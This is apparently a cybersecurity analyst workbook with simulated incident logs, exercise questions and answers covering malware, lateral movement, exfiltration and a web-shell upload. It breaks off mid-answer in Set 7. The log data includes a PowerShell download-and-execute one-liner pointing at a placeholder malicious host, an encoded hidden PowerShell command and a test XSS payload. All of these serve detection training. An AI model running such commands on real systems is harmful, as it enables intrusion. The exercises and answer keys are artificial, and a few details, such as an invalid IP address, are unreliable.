CYBERSECURITY

ANALYST
INCIDENT
ANALYSIS
EXERCISES WITH
QUESTIONS AND
ANSWERS

BY IZZMIER IZZUDDIN
SET 1: SUPPLY CHAIN COMPROMISE

Logs

Firewall Logs

Date: 2024-12-26T03:45:12Z
Source IP: 192.168.1.45
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 234,657
Bytes Received: 1,045,234

Date: 2024-12-26T03:50:24Z
Source IP: 192.168.1.45
Destination IP: 123.45.67.89
Destination Port: 22
Protocol: SSH
Action: BLOCKED
Bytes Sent: 987
Bytes Received: 0

Date: 2024-12-26T03:55:10Z
Source IP: 192.168.1.100
Destination IP: 8.8.8.8
Destination Port: 53
Protocol: DNS
Query: suspicious-malware-site[.]com
Action: ALLOWED

Endpoint Detection and Response (EDR) Alerts

Alert ID: 109284

Time: 2024-12-26T03:40:10Z
Host: DESKTOP-34HJ82
Severity: High
Detection: Malicious PowerShell Script
Command Line: powershell.exe -EncodedCommand <base64string>
File Path: C:\Users\User\AppData\Local\Temp\update.exe
Action Taken: Quarantined

Alert ID: 109285

Time: 2024-12-26T03:45:15Z
Host: SERVER-01
Severity: Critical
Detection: Suspicious Network Activity
Details: Outbound traffic to IP 45.67.89.123 over HTTPS (Potential C2 Communication)
Action Taken: Blocked by EDR

SIEM Correlation Logs

2024-12-26T03:38:50Z - Correlation Rule Triggered: "Suspicious PowerShell Activity"

Host: DESKTOP-34HJ82
Rule: Base64 encoded PowerShell detected
Details: powershell.exe -EncodedCommand

2024-12-26T03:42:12Z - Correlation Rule Triggered: "Outbound C2 Communication"

Host: SERVER-01
Destination IP: 45.67.89.123
Protocol: HTTPS
Details: Large data transfer detected

2024-12-26T03:44:33Z - Correlation Rule Triggered: "DNS Query for Known Malicious

Domain"
Host: DESKTOP-34HJ82
Domain: suspicious-malware-site[.]com
Action: Alerted

DNS Traffic Logs

Timestamp: 2024-12-26T03:35:40Z
Source IP: 192.168.1.45
Query: suspicious-malware-site[.]com
Response: 45.67.89.123

Timestamp: 2024-12-26T03:40:50Z
Source IP: 192.168.1.45
Query: update[.]legit-software[.]com
Response: 23.45.67.89

QUESTIONS

1. What was the initial sign of compromise?

2. What is the significance of the base64-encoded PowerShell command?
3. What was the suspected Command and Control (C2) server?
4. Why was the DNS query for suspicious-malware-site[.]com flagged?
5. What mitigation action did the EDR take on DESKTOP-34HJ82?
6. What is the significance of the blocked SSH attempt in the firewall logs?
7. What protocol was used for potential data exfiltration?
8. How did the SIEM correlate the DNS traffic with the malicious activity?
9. What additional logs should be analysed to confirm lateral movement?
10. How can future attacks of this nature be mitigated?
SET 2: LATERAL MOVEMENT DETECTION

Logs

Windows Event Logs

Date: 2024-12-26T03:50:20Z
Event ID: 4624
Logon Type: 3
Account Name: attacker_account
Source Network Address: 192.168.1.45
Target: SERVER-01
Authentication Package: NTLM
Status: Success

Date: 2024-12-26T03:52:30Z
Event ID: 4625
Logon Type: 3
Account Name: admin_user
Source Network Address: 192.168.1.45
Target: SERVER-02
Authentication Package: NTLM
Status: Failed

Date: 2024-12-26T03:54:00Z
Event ID: 4673
Process: rundll32.exe
Privilege: SeDebugPrivilege
Target: C:\Windows\System32\winlogon.exe
Result: Success

Date: 2024-12-26T03:55:10Z
Event ID: 4688
New Process Created: C:\Windows\Temp\malicious_script.ps1
Account Name: SYSTEM
Parent Process: C:\Windows\System32\svchost.exe

SIEM Correlation Logs

2024-12-26T03:50:25Z - Correlation Rule Triggered: "Successful Lateral Movement"

Host: SERVER-01
Source: DESKTOP-34HJ82
Account: attacker_account
Protocol: SMB
 Action: Alerted

2024-12-26T03:55:12Z - Correlation Rule Triggered: "Privilege Escalation Attempt"

Host: SERVER-02
Account: SYSTEM
Details: SeDebugPrivilege enabled
Action: Alerted

2024-12-26T03:55:15Z - Correlation Rule Triggered: "Malicious PowerShell Execution"

Host: SERVER-02
File: malicious_script.ps1
Action: Alerted

Network Traffic Logs

Timestamp: 2024-12-26T03:50:18Z
Source IP: 192.168.1.45
Destination IP: 192.168.1.50
Protocol: SMB
Action: Allowed

Timestamp: 2024-12-26T03:55:00Z
Source IP: 192.168.1.50
Destination IP: 192.168.1.51
Protocol: RDP
Action: Allowed

QUESTIONS

1. What indicates a successful lateral movement attempt in the logs?

2. What is the significance of Event ID 4625 in the logs?
3. What privilege escalation attempt is visible in the logs?
4. What process was executed after gaining elevated privileges?
5. Which protocol was used for lateral movement?
6. What suspicious activity occurred on SERVER-02 after lateral movement?
7. How did the SIEM correlate lateral movement events?
8. What can be inferred from the RDP traffic in the network logs?
9. What could be the attacker's objective based on the logs?
10. What mitigations could prevent this type of lateral movement?
SET 3: DATA EXFILTRATION ANALYSIS

Logs

Firewall Logs

Date: 2024-12-26T04:10:15Z
Source IP: 192.168.1.50
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 4,503,241
Bytes Received: 1,023,109

Date: 2024-12-26T04:15:10Z
Source IP: 192.168.1.50
Destination IP: 89.67.45.123
Destination Port: 80
Protocol: HTTP
Action: BLOCKED
Bytes Sent: 9,432
Bytes Received: 0

SIEM Correlation Logs

2024-12-26T04:09:50Z - Correlation Rule Triggered: "Unusual Data Transfer Volume"

Host: SERVER-02
Destination: 45.67.89.123
Data Sent: 4.5 MB
Action: Alerted

2024-12-26T04:11:30Z - Correlation Rule Triggered: "Suspicious Domain Activity"

Host: SERVER-02
Domain: malware-c2[.]com
Action: Alerted

Proxy Logs

Date: 2024-12-26T04:10:12Z
User: SYSTEM
URL: https://45.67.89.123/upload
Request Size: 4,503,241 bytes
Response Code: 200 OK
Date: 2024-12-26T04:15:05Z
User: SYSTEM
URL: http://malware-c2[.]com/exfil
Request Size: 9,432 bytes
Response Code: Blocked

DNS Traffic Logs

Date: 2024-12-26T04:09:40Z
Source IP: 192.168.1.50
Query: malware-c2[.]com
Response: 89.67.45.123

Date: 2024-12-26T04:10:05Z
Source IP: 192.168.1.50
Query: upload.malicious-c2[.]com
Response: 45.67.89.123

QUESTIONS

1. What was the size of the data exfiltrated during the attack?
2. Which protocol was used for data exfiltration?
3. What domain is associated with the data exfiltration attempt?
4. What triggered the SIEM's "Unusual Data Transfer Volume" rule?
5. What action was taken against the HTTP data exfiltration attempt?
6. What other evidence suggests malicious intent in the data exfiltration?
7. Why is using HTTPS advantageous for attackers during data exfiltration?
8. What additional steps can be taken to confirm the content of the exfiltrated data?
9. What mitigation measures could prevent such data exfiltration in the future?
10. How can threat intelligence enhance detection of such attacks?
SET 4: MALWARE ANALYSIS

Logs

Endpoint Detection Logs

Date: 2024-12-26T04:30:05Z
Alert: "Suspicious File Downloaded"
File Name: payload.exe
Hash: a1b2c3d4e5f67890abcdef1234567890
Download URL: http://malicious-site[.]com/payload.exe
User: SYSTEM
Action: Alerted

Date: 2024-12-26T04:32:10Z
Alert: "Malware Execution Detected"
Process: payload.exe
Parent Process: explorer.exe
Host: SERVER-02
Action: Quarantined

Date: 2024-12-26T04:35:20Z
Alert: "Persistence Mechanism Detected"
File: C:\Windows\System32\startuplink.dll
Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup
Action: Alerted

File Hash Analysis

File Name: payload.exe

Hash: a1b2c3d4e5f67890abcdef1234567890
VirusTotal: Detected by 54/60 vendors
Tags: Trojan, C2 Communication, Persistence
Behavior: Creates registry entries, modifies system files, connects to C2 servers.

Network Traffic Logs

Timestamp: 2024-12-26T04:31:00Z
Source IP: 192.168.1.50
Destination IP: 203.0.113.42
Protocol: HTTP
URL: http://malicious-site[.]com/payload.exe
Action: Allowed
Timestamp: 2024-12-26T04:35:00Z
Source IP: 192.168.1.50
Destination IP: 203.0.113.50
Protocol: HTTPS
Action: Allowed
Bytes Sent: 1,500
Bytes Received: 6,200

Windows Event Logs

Date: 2024-12-26T04:32:15Z
Event ID: 4688
New Process Created: C:\Users\Admin\AppData\Local\Temp\payload.exe
Account Name: SYSTEM
Parent Process: explorer.exe

Date: 2024-12-26T04:34:10Z
Event ID: 4657
Registry Value Modified:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup
Process: regedit.exe

QUESTIONS

1. What is the name of the suspicious file detected on the endpoint?

2. Where was the malware downloaded from?
3. What did the malware attempt to do after execution?
4. How was the malware identified as malicious?
5. Which registry key was modified as part of the malware's persistence mechanism?
6. What C2 communication was detected in the network traffic logs?
7. What was the parent process for the malicious executable?
8. What specific mitigations could have stopped this malware earlier in the kill
chain?
9. How would you ensure the malware is completely removed from the system?
10. How can the SOC team strengthen defenses against similar attacks?
SET 5: INSIDER THREAT ANALYSIS

Logs

HR Records

Employee: Izzmier
Role: Database Administrator
Last Performance Review: 2024-11-01 (Satisfactory)
Resignation Notice: 2024-12-20 (Effective 2024-12-31)
Recent Complaints: None Logged

Database Access Logs

Date: 2024-12-25T21:05:00Z
User: Izzmier
Database: Finance_DB
Action: SELECT * FROM customer_data
Records Affected: 1,000,000
Source IP: 192.168.1.102

Date: 2024-12-25T21:15:00Z
User: Izzmier
Database: Finance_DB
Action: Export customer_data to file
File Name: customers_2024.csv
Records Exported: 1,000,000

Endpoint Logs

Date: 2024-12-25T21:20:00Z
User: Izzmier
File: C:\Users\Izzmier\Desktop\customers_2024.csv
Action: Uploaded to external drive
Device: USB Device (Vendor: Generic, Serial: A123B456)
Action: Completed

Network Traffic Logs

Date: 2024-12-25T21:30:00Z
Source IP: 192.168.1.102
Destination IP: 203.0.113.200
Protocol: HTTPS
Data Transferred: 10 MB
Action: Allowed

Access Anomalies

Date: 2024-12-25T21:05:00Z
Alert: "Database Access Outside Normal Hours"
User: Izzmier
Triggered Rule: "Access to sensitive tables after business hours"

QUESTIONS

1. What suspicious activity was performed by the user?

2. What mechanism was used to transfer the exported file?
3. Why is this behavior considered suspicious?
4. What rule triggered the alert in the SIEM system?
5. Was there any indication of external sharing of the exported data?
6. What additional evidence confirms data exfiltration?
7. What steps should be taken to mitigate the incident immediately?
8. How could this incident have been prevented?
9. What potential business impacts could arise from this incident?
10. What corrective actions should be taken for future insider threats?
SET 6: ADVANCED THREAT HUNTING

Logs

Threat Intelligence Report

Threat Actor: APT-29

Techniques: Credential Dumping, Lateral Movement, Data Exfiltration
Known C2 IPs: 104.21.65.140, 192.0.2.55
Malware Used: StealthShell v4.3
Observed Activity: Spear-phishing campaigns targeting financial institutions.

Firewall Logs

Timestamp: 2024-12-20T23:45:12Z
Source IP: 192.0.2.55
Destination IP: 192.168.10.5
Protocol: HTTPS
Action: Allowed
Bytes Sent: 2,000
Bytes Received: 15,500

Timestamp: 2024-12-21T00:30:45Z
Source IP: 104.21.65.140
Destination IP: 192.168.10.10
Protocol: HTTPS
Action: Allowed
Bytes Sent: 3,500
Bytes Received: 20,700

Endpoint Detection Logs

Date: 2024-12-21T01:05:00Z
Alert: "Suspicious PowerShell Script Execution"
Process: powershell.exe
Command: "iex(New-Object Net.WebClient).DownloadString('http://malicious-
site[.]com/init.ps1')"
Host: SERVER-DB01
Action: Blocked

Date: 2024-12-21T01:10:00Z
Alert: "Credential Dumping Detected"
Tool: mimikatz.exe
Process Path: C:\Temp\mimikatz.exe
User: Administrator
Host: SERVER-APP01
Action: Quarantined

Active Directory Logs

Date: 2024-12-21T01:15:00Z
Event ID: 4625
Failed Login Attempt
User: Administrator
Source Workstation: SERVER-APP01

Date: 2024-12-21T01:16:00Z
Event ID: 4672
Privileged Access Granted
User: SYSTEM
Source Workstation: SERVER-DB01

SIEM Alerts

Date: 2024-12-21T01:20:00Z
Alert: "Multiple Host Compromises Detected"
Source: Threat Correlation Engine
Severity: High
Hosts Involved: SERVER-DB01, SERVER-APP01, SERVER-FILE01

QUESTIONS

1. What is the suspected threat actor involved in this incident?

2. Which hosts are identified as compromised?
3. What malicious tool was used for credential dumping?
4. What PowerShell command was executed on SERVER-DB01 and what was its
purpose?
5. Which two external IPs were communicating with the internal network and why is
this significant?
6. How was privileged access granted during the attack?
7. What indicators of compromise (IOCs) should be shared with other teams for
proactive defense?
8. What immediate containment actions should be taken for this incident?
9. What detection gaps were exploited by the attacker?
10. How can threat hunting processes be improved to prevent future incidents?
SET 7: ZERO-DAY EXPLOIT INCIDENT

Logs

Web Server Logs

Date: 2024-12-22T10:12:45Z
IP Address: 203.0.113.45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/117.0.0.0 Safari/537.36
Request: POST /vulnerable_endpoint.php HTTP/1.1
Payload: {"input":"<script>alert('XSS')</script>"}
Response Code: 500 (Internal Server Error)

Date: 2024-12-22T10:13:30Z
IP Address: 203.0.113.45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/117.0.0.0 Safari/537.36
Request: POST /vulnerable_endpoint.php HTTP/1.1
Payload: {"input":"<malicious_code>shell_upload</malicious_code>"}
Response Code: 200 (Success)

Network Traffic Logs

Date: 2024-12-22T10:14:15Z
Source IP: 203.0.113.45
Destination IP: 192.168.10.20
Protocol: HTTP
Bytes Sent: 1,500
Bytes Received: 25,000
Action: Allowed

Date: 2024-12-22T10:15:00Z
Source IP: 192.168.10.20
Destination IP: 203.0.113.46
Protocol: HTTPS
Bytes Sent: 10,000
Bytes Received: 500
Action: Allowed

File System Logs

Date: 2024-12-22T10:13:40Z
File Created: /var/www/html/uploads/malicious_shell.php
User: www-data
Process: apache2
Action: Write

Date: 2024-12-22T10:15:10Z
File Executed: /var/www/html/uploads/malicious_shell.php
User: www-data
Process: php
Action: Execute

SIEM Correlation Alerts

Date: 2024-12-22T10:15:30Z
Alert: "Suspicious File Upload Detected"
Severity: Critical
Description: File 'malicious_shell.php' uploaded and executed on Web Server.
Host: WEB-SERVER01
Source IP: 203.0.113.45
Destination IP: 192.168.10.20

Threat Intelligence Feed

Zero-Day Exploit: CVE-2024-XXXX

Vulnerable Component: Custom PHP File Upload Module
Impact: Remote Code Execution
Mitigation: Patch unavailable, recommend disabling affected functionality.

QUESTIONS

1. What type of attack is observed in this incident?

2. How did the attacker gain access to the web server?
3. What was the IP address of the attacker?
4. What actions were taken by the malicious file after upload?
5. Which hosts were involved in the network traffic during the incident?
6. What immediate containment steps should be taken?
7. How should the vulnerability be mitigated, considering no patch is available?
8. What proactive measures could have prevented this attack?
9. What logs provided evidence of the malicious activity?
10. What potential impact could this attack have if not contained?
SET 8: SUPPLY CHAIN ATTACK SIMULATION

Logs

Email Logs

Date: 2024-12-23T08:15:30Z
From: [email protected]
To: [email protected]
Subject: Urgent: Security Patch Update
Attachment: update_security_patch.exe

Date: 2024-12-23T08:16:00Z
User: [email protected]
Action: Opened attachment

Endpoint Detection Logs

Date: 2024-12-23T08:17:15Z
Alert: "Unrecognised Executable File Execution"
Process: update_security_patch.exe
File Hash: e3b0c44298fc1c149afbf4c8996fb924
Action: Blocked
Host: WORKSTATION-102

Date: 2024-12-23T08:17:45Z
Alert: "Unauthorised PowerShell Script Execution"
Command: powershell.exe -nop -w hidden -encodedcommand
"YXBwIHJ1bnMgdXByYW5jIGFuZCB1cGxvYWRzIG1hbHdhcmU="
Host: WORKSTATION-102
Action: Allowed

Firewall Logs

Date: 2024-12-23T08:18:10Z
Source IP: 192.168.10.102
Destination IP: 192.0.2.200
Protocol: HTTPS
Action: Allowed
Bytes Sent: 5,000
Bytes Received: 500

Date: 2024-12-23T08:19:00Z
Source IP: 192.168.10.102
Destination IP: 203.0.113.10
Protocol: HTTPS
Action: Allowed
Bytes Sent: 10,500
Bytes Received: 15,000

SIEM Correlation Alerts

Date: 2024-12-23T08:20:00Z
Alert: "Possible Supply Chain Compromise"
Severity: Critical
Description: Suspicious executable (update_security_patch.exe) detected from a vendor
email.
Affected Host: WORKSTATION-102

DNS Query Logs

Date: 2024-12-23T08:21:30Z
Source: WORKSTATION-102
Queried Domain: malicious-c2[.]com
Response: 203.0.113.10

QUESTIONS

1. How did the attacker deliver the malicious payload?

2. What file was executed by the target user and what was its hash?
3. What suspicious activity occurred on the workstation after the file execution?
4. What are the suspected Command-and-Control (C2) IPs?
5. What immediate actions should be taken to contain the threat?
6. What indicators suggest this was a supply chain attack?
7. How can the organisation validate the legitimacy of the vendor’s email?
8. What logs provided evidence of communication with malicious infrastructure?
9. What steps should be taken to determine the scope of this compromise?
10. What steps should be taken to determine the scope of this compromise?
SET 9: CLOUD MISCONFIGURATION EXPLOITATION

Logs

Cloud Access Logs

Date: 2024-12-24T03:10:45Z
User: anonymous
Action: GET
Resource: s3://sensitive-data-bucket/financial_report_2024.xlsx
Response Code: 200 (Success)
Source IP: 203.0.113.55

Date: 2024-12-24T03:11:30Z
User: anonymous
Action: LIST
Resource: s3://sensitive-data-bucket/
Response Code: 200 (Success)
Source IP: 203.0.113.55

Date: 2024-12-24T03:12:10Z
User: anonymous
Action: DELETE
Resource: s3://sensitive-data-bucket/backups/
Response Code: 204 (No Content)
Source IP: 203.0.113.55

Firewall Logs

Date: 2024-12-24T03:09:00Z
Source IP: 203.0.113.55
Destination IP: 192.0.2.100
Protocol: HTTPS
Bytes Sent: 3,500
Bytes Received: 10,000
Action: Allowed

Date: 2024-12-24T03:10:00Z
Source IP: 203.0.113.55
Destination IP: 192.0.2.101
Protocol: HTTPS
Bytes Sent: 5,000
Bytes Received: 20,000
Action: Allowed
Cloud Security Alerts

Date: 2024-12-24T03:13:00Z
Alert: "Publicly Accessible Bucket Detected"
Severity: High
Resource: s3://sensitive-data-bucket/

SIEM Correlation Alerts

Date: 2024-12-24T03:15:30Z
Alert: "Suspicious Anonymous Access to Cloud Bucket"
Severity: Critical
Description: Anonymous user accessed and modified sensitive data in cloud storage.
Affected Resource: s3://sensitive-data-bucket/
Source IP: 203.0.113.55

Threat Intelligence Feed

Indicator: 203.0.113.55
Category: Known Threat Actor
Description: IP associated with cloud bucket exploitation and ransomware deployment.

QUESTIONS

1. What vulnerability allowed the attacker to access sensitive data?

2. What actions did the attacker perform on the cloud bucket?
3. What is the source IP of the attacker and why is it significant?
4. What was the first indication of the attack?
5. What immediate steps should be taken to contain the attack?
6. How could this misconfiguration have been prevented?
7. What additional risks does this incident pose?
8. What further investigation is needed after containment?
9. What tools can be used to monitor cloud security more effectively?
10. What policies should be implemented to prevent similar incidents?
SET 10: AI-POWERED MALWARE ATTACK SIMULATION

Logs

Email Logs

Date: 2024-12-25T14:10:30Z
From: [email protected]
To: [email protected]
Subject: [Urgent] System Performance Analysis Required
Body: Dear User,
Our automated system has detected unusual performance issues in your workstation.
Please download and run the attached diagnostic tool immediately to avoid system
shutdown.
Attachment: performance_analysis_tool.exe

Endpoint Detection Logs

Date: 2024-12-25T14:12:00Z
Alert: "Suspicious Executable File Detected"
Process: performance_analysis_tool.exe
File Hash: 8df48e58b0a1fcb99eabcd00112d34f7
Action: Allowed
Host: WORKSTATION-305

Date: 2024-12-25T14:12:15Z
Alert: "AI-Driven Malware Behavior Detected"
Process: AI_malware.exe (spawned by performance_analysis_tool.exe)
Action: Allowed
Behavior: Data exfiltration pattern recognised.

Network Traffic Logs

Date: 2024-12-25T14:13:30Z
Source IP: 192.168.15.305
Destination IP: 198.51.100.45
Protocol: HTTPS
Bytes Sent: 15,000
Bytes Received: 3,500
Action: Allowed

Date: 2024-12-25T14:14:00Z
Source IP: 192.168.15.305
Destination IP: 203.0.113.20
Protocol: HTTPS
Bytes Sent: 50,000
Bytes Received: 10,000
Action: Allowed

SIEM Correlation Alerts

Date: 2024-12-25T14:15:00Z
Alert: "High-Speed Data Exfiltration Detected"
Severity: Critical
Source: WORKSTATION-305
Destination: External IPs (198.51.100.45, 203.0.113.20)
Description: Large volumes of data exfiltrated in a short time frame.

AI Behavior Analysis Logs

Date: 2024-12-25T14:16:00Z
Process: AI_malware.exe
Behavior: Adaptive and polymorphic. Changed hash to
4a8b3f9c0ef12a67edbc34500d1f78de.
Capabilities Detected:
- Real-time evasion of antivirus.
- AI-driven identification of unprotected files.
- Use of stealthy exfiltration methods (encrypted HTTPS channels).

Threat Intelligence Feed

Indicator: 198.51.100.45, 203.0.113.20

Category: Known C2 Servers
Description: Associated with recent AI-powered malware campaigns targeting enterprises.

QUESTIONS

1. How was the malware delivered to the target?

2. What behavior was observed from the malware upon execution?
3. What external IPs were involved in the data exfiltration and what are they
associated with?
4. What is the hash of the original and polymorphic malware files?
5. What were the volumes of data exfiltrated to the C2 servers?
6. What immediate containment steps should be taken?
7. What advanced defenses could mitigate AI-driven malware?
8. What makes this attack particularly challenging to defend against?
9. How can the organisation improve its phishing defenses?
10. What follow-up investigations are necessary?
ANSWERS

SET 1

1. What was the initial sign of compromise?

Answer: A malicious PowerShell script executed on DESKTOP-34HJ82 was detected by

the EDR.

2. What is the significance of the base64-encoded PowerShell command?

Answer: Base64 encoding is commonly used by attackers to obfuscate malicious

commands, making them harder to detect.

3. What was the suspected Command and Control (C2) server?

Answer: The IP 45.67.89.123 was identified as the C2 server based on the HTTPS traffic
logs.

4. Why was the DNS query for suspicious-malware-site[.]com flagged?

Answer: It is a known malicious domain commonly associated with malware

distribution.

5. What mitigation action did the EDR take on DESKTOP-34HJ82?

Answer: The EDR quarantined the file update.exe and blocked suspicious network
activity.

6. What is the significance of the blocked SSH attempt in the firewall logs?

Answer: It suggests an attacker may have been attempting lateral movement or

privilege escalation within the network.

7. What protocol was used for potential data exfiltration?

Answer: The HTTPS protocol was used for large data transfers to the suspected C2
server.

8. How did the SIEM correlate the DNS traffic with the malicious activity?

Answer: The SIEM rule matched the DNS query to a list of known malicious domains
and correlated it with the outbound network traffic.

9. What additional logs should be analysed to confirm lateral movement?

 Answer: Analyse Windows Event Logs for login attempts, remote execution commands
and other suspicious activity.

10. How can future attacks of this nature be mitigated?

Answer: Implement strict update validation processes, regular DNS monitoring and
enhanced endpoint controls.
SET 2

1. What indicates a successful lateral movement attempt in the logs?

Answer: The Windows Event Log (Event ID 4624) shows a successful login using the
account attacker_account from 192.168.1.45 to SERVER-01.

2. What is the significance of Event ID 4625 in the logs?

Answer: Event ID 4625 indicates a failed login attempt on SERVER-02 by the admin_user,
suggesting the attacker was probing for valid credentials.

3. What privilege escalation attempt is visible in the logs?

Answer: Event ID 4673 shows that the attacker used rundll32.exe to enable
SeDebugPrivilege, which is often exploited to gain higher privileges.

4. What process was executed after gaining elevated privileges?

Answer: A malicious PowerShell script (malicious_script.ps1) was executed, as shown in

Event ID 4688.

5. Which protocol was used for lateral movement?

Answer: The logs indicate that the attacker used the SMB protocol for lateral movement
between hosts.

6. What suspicious activity occurred on SERVER-02 after lateral movement?

Answer: The attacker executed a malicious PowerShell script and enabled

SeDebugPrivilege on SERVER-02, indicating privilege escalation.

7. How did the SIEM correlate lateral movement events?

Answer: The SIEM identified a pattern of suspicious logins, privilege escalation and
process creation that triggered correlation rules for lateral movement.

8. What can be inferred from the RDP traffic in the network logs?

Answer: The attacker may have used RDP from 192.168.1.50 to 192.168.1.51 to maintain
remote access after achieving lateral movement.

9. What could be the attacker's objective based on the logs?

Answer: The attacker appears to be moving laterally to access sensitive systems, escalate
privileges and establish persistence.

10. What mitigations could prevent this type of lateral movement?

Answer: Implementing least privilege, network segmentation, multi-factor authentication

and strict monitoring of privilege escalation attempts can mitigate such attacks.
SET 3

1. What was the size of the data exfiltrated during the attack?

Answer: The logs indicate that approximately 4.5 MB of data was transferred to the C2
server at 45.67.89.123.

2. Which protocol was used for data exfiltration?

Answer: The attacker used the HTTPS protocol for the exfiltration, as shown in the firewall
and proxy logs.

3. What domain is associated with the data exfiltration attempt?

Answer: The domain upload.malicious-c2[.]com is associated with the data exfiltration,

resolved to 45.67.89.123.

4. What triggered the SIEM's "Unusual Data Transfer Volume" rule?

Answer: A single data transfer of 4.5 MB from SERVER-02 to the external IP 45.67.89.123
was identified as anomalous.

5. What action was taken against the HTTP data exfiltration attempt?

Answer: The HTTP request to malware-c2[.]com was blocked by the proxy, as indicated in
the logs.

6. What other evidence suggests malicious intent in the data exfiltration?

Answer: DNS queries to known malicious domains (malware-c2[.]com) and large HTTPS
transfers to external IPs are clear signs of data exfiltration.

7. Why is using HTTPS advantageous for attackers during data exfiltration?

Answer: HTTPS encrypts traffic, making it harder to inspect and detect malicious
activities.

8. What additional steps can be taken to confirm the content of the exfiltrated data?

Answer: Investigate packet capture logs (if available) or analyse file transfer details from
the affected host.

9. What mitigation measures could prevent such data exfiltration in the future?
Answer: Implement data loss prevention (DLP) systems, block known malicious domains
and monitor unusual data transfer patterns.

10. How can threat intelligence enhance detection of such attacks?

Answer: Threat intelligence can provide updated indicators of compromise (IOCs), such
as malicious domains and IPs, for correlation and real-time detection.
SET 4

1. What is the name of the suspicious file detected on the endpoint?

Answer: The suspicious file is named payload.exe.

2. Where was the malware downloaded from?

Answer: The malware was downloaded from http://malicious-site[.]com/payload.exe.

3. What did the malware attempt to do after execution?

Answer: The malware attempted to establish persistence by creating a registry key

(HKCU\...\Run\malware_startup) and connecting to a command-and-control (C2) server.

4. How was the malware identified as malicious?

Answer: Endpoint detection systems flagged the file based on its behavior and VirusTotal
analysis showed it was detected by 54/60 vendors.

5. Which registry key was modified as part of the malware's persistence mechanism?

Answer: The malware modified

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup.

6. What C2 communication was detected in the network traffic logs?

Answer: The malware communicated with a C2 server at 203.0.113.50 using the HTTPS
protocol.

7. What was the parent process for the malicious executable?

Answer: The parent process for payload.exe was explorer.exe.

8. What specific mitigations could have stopped this malware earlier in the kill chain?

Answer: URL filtering could block access to malicious sites and endpoint protection could
prevent execution of untrusted files.

9. How would you ensure the malware is completely removed from the system?

Answer: Steps include removing the registry key, deleting the file, terminating malicious
processes and scanning the system with antivirus software.

10. How can the SOC team strengthen defenses against similar attacks?
Answer: Implementing application whitelisting, enhancing network monitoring for C2
communication and educating users to avoid downloading files from untrusted sources.
SET 5

1. What suspicious activity was performed by the user?

Answer: The user, Izzmier, accessed and exported a full customer database (Finance_DB)
outside of normal working hours.

2. What mechanism was used to transfer the exported file?

Answer: Izzmier transferred the file customers_2024.csv to an external USB drive.

3. Why is this behavior considered suspicious?

Answer: The access occurred outside of normal business hours, involved a large data
export and the file was moved to an unauthorised external device.

4. What rule triggered the alert in the SIEM system?

Answer: The rule "Access to sensitive tables after business hours" was triggered when
Izzmier accessed the Finance_DB at 21:05.

5. Was there any indication of external sharing of the exported data?

Answer: Yes, the network logs show a transfer of 10 MB from Izzmier’s system to an
external IP (203.0.113.200) over HTTPS.

6. What additional evidence confirms data exfiltration?

Answer: Both the network logs indicating external data transfer and the endpoint logs
showing a file upload to a USB device confirm exfiltration.

7. What steps should be taken to mitigate the incident immediately?

Answer: Disable Izzmier’s account, confiscate the USB drive, block the external IP address
and initiate an investigation into the destination server.

8. How could this incident have been prevented?

Answer: Implementing data loss prevention (DLP) tools, restricting external storage
devices and monitoring sensitive data access in real-time could have helped prevent the
incident.

9. What potential business impacts could arise from this incident?

Answer: Leakage of customer data could result in regulatory fines, reputational damage
and loss of customer trust.

10. What corrective actions should be taken for future insider threats?

Answer: Strengthen access controls, enforce least privilege, conduct regular employee
audits and increase monitoring during the resignation period of employees.
SET 6

1. What is the suspected threat actor involved in this incident?

Answer: The suspected threat actor is APT-29.

2. Which hosts are identified as compromised?

Answer: The compromised hosts are SERVER-DB01, SERVER-APP01 and SERVER-FILE01.

3. What malicious tool was used for credential dumping?

Answer: The tool used for credential dumping was mimikatz.exe.

4. What PowerShell command was executed on SERVER-DB01 and what was its
purpose?

Answer: The command executed was iex(New-Object

Net.WebClient).DownloadString('http://malicious-site[.]com/init.ps1'). Its purpose was to
download and execute a malicious script.

5. Which two external IPs were communicating with the internal network and why is
this significant?

Answer: The external IPs 192.0.2.55 and 104.21.65.140 were communicating with the
network. These are known C2 IPs associated with APT-29.

6. How was privileged access granted during the attack?

Answer: Privileged access was granted through an event (ID: 4672) involving the SYSTEM
account on SERVER-DB01.

7. What indicators of compromise (IOCs) should be shared with other teams for
proactive defense?

Answer: IOCs include:

• External IPs: 192.0.2.55, 104.21.65.140

• Domain: http://malicious-site[.]com
• Tools: mimikatz.exe, init.ps1

8. What immediate containment actions should be taken for this incident?

Answer: Immediate actions include:

 • Isolating compromised hosts (SERVER-DB01, SERVER-APP01, SERVER-FILE01).
• Blocking C2 IPs and domains in firewalls.
• Revoking and resetting credentials for affected accounts.

9. What detection gaps were exploited by the attacker?

Answer: Gaps included insufficient monitoring of PowerShell activity and inadequate

prevention of lateral movement between hosts.

10. How can threat hunting processes be improved to prevent future incidents?

Answer: Improvements include:

• Regular threat intelligence updates.

• Enhanced PowerShell script logging and analysis.
• Deploying endpoint detection tools with behavioral analysis capabilities.
SET 7

1. What type of attack is observed in this incident?

Answer: A zero-day exploit targeting a vulnerable PHP file upload module to achieve
remote code execution.

2. How did the attacker gain access to the web server?

Answer: The attacker exploited the vulnerable_endpoint.php by uploading and executing a

malicious file (malicious_shell.php).

3. What was the IP address of the attacker?

Answer: The attacker’s IP address was 203.0.113.45.

4. What actions were taken by the malicious file after upload?

Answer: The file was executed, potentially granting the attacker remote access to the web
server.

5. Which hosts were involved in the network traffic during the incident?

Answer: The involved hosts were the attacker (203.0.113.45), the web server
(192.168.10.20) and another external IP (203.0.113.46), possibly a Command-and-Control
(C2) server.

6. What immediate containment steps should be taken?

Answer:

• Disconnect the affected server from the network.

• Remove the malicious file (malicious_shell.php).
• Block the attacker’s IP address (203.0.113.45).

